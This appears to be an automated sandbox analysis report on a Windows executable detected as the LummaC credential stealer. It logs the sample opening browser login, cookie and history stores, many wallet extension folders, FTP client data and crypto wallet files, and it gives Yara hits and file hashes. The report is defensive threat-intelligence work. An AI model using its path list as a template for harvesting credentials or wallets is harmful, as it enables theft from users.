Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Directory queried: number of queries: 1001

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

ID:	1579761
Product:	CloudBasic
Start time:	08:39:37
Start date:	23.12.2024
Sample:	jSFUzuYPG9.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	820f418e980b172684fe96e4aa6e50a5
SHA1:	a5498979325229c5494a01fddd7e8013750a5ce7
SHA256:	06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jSFUzuYPG9.exe_89e0a2a224744ed9d773cdd526d4b8ba975a_428023ae_40004372-aeb3-4959-98da-6976da283c96\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	FF72212B19E055C0BD50077361089F14	1D200A52C547518FC6950A54B158A96D36A8D60C	E2530A89CC5A8D8913FCCCC6E81F0743AF9383545E1A6CCF15A33EB550C158B3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C9C.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Dec 23 07:41:08 2024, 0x1205a4 type	BA4DD9D6BA6E729046B2797D183C99CF	F1F23D5927D676C24C265095D7961144ACDAD025	5F3AA81942B8F43B22C4E47C1120FD4B8417A7902D9207735AD7EBEDB5168A4E
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DD6.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	F9F6914B867697FCC3B80EAC9E29F571	EEFAB1DA695C4F20AEF6B95DA54F1AF0C543D04B	FB331F6B4FCF7CF6DAAF1DCFAA2501BBB363755CF6B3378A32170F59C5C763EA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E25.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F294DEA59C7F4333693724F36689A9A0	16C64CDF8559CD94E7395B7A1464D16BDD332112	E5C8783F5D67B8D34148CB351B7BA04D971AA1B21F09F1E366CEE3965D9EE923
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	789AAF67EA0B47FFCBBD9E56001A8494	D42D3E813BA0162965F49502B23658F2955455DD	3B0D1B4CDA2DEA9565C7E64616A182BE72AE28E7E3B79E834DE40F2EF91FCEDA

Windows Analysis Report
jSFUzuYPG9.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report jSFUzuYPG9.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
jSFUzuYPG9.exe

Malware Threat Intel
Provided by